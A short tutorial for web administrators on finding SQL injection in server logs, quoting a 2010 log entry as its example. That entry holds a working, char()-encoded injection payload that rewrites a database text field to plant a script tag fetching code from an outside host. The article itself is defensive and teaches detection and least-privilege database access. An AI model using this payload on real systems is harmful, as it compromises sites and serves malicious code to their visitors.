This particular attack (unlike some from the past which would loop through the system objects table) is done by analyzing your error pages then constructing new update queries which target known tables and fields. You can find the hole by looking in your web server logs.
Below is an example of some of the data taken from my log so you can see what is being done:
2010-09-23 10:30:16 W3SVC1302398943 DM100 192.168.12.10 GET /search/List.cfm
D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd389601
'+update+q_ntd+set+Body=cast(Body+as+varchar(8000))%2Bcast(char(60)%2
Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2
Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2
Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2
Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2
Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2
Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2
Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2
Bchar(115)%2Bchar(99)%2
Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))
-- 80 - 77.78.239.56 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:
|
This is what you want to look for as most SQL injections issue this command:
The cast command can be found in most if not all sql injection attacks. What the cast command does is convert a data field from one type to another. In the illustration above the cast command is used to convert the field to varchar with a length of 8000. If you're connected to your database as SA, the command will be taken in and issued, even on a read like a select statement. With the field opened up the injector can inject anything he wants. The Bchar equivalents above are the injected text.
To find the injector run a search against the CONTENT of all server log files, starting with the most recent, looking for the cast( command. A few of your server logs should pop up. Open the first one in Word Pad and do a find on cast(. If you see something like this above, you know you've found the source.
The server log will tell you the site and the filename of the web page causing the leak. When you find it, close the hole. If it is a read function, like a select statement, connect to your database with read only privileges. If you continue to connect to your database with more privileges than necessary, you will continue to have problems regardless of how well you filter the input.
Read the article SQL Injection (above) for more information on how to restrict access to your database server. |
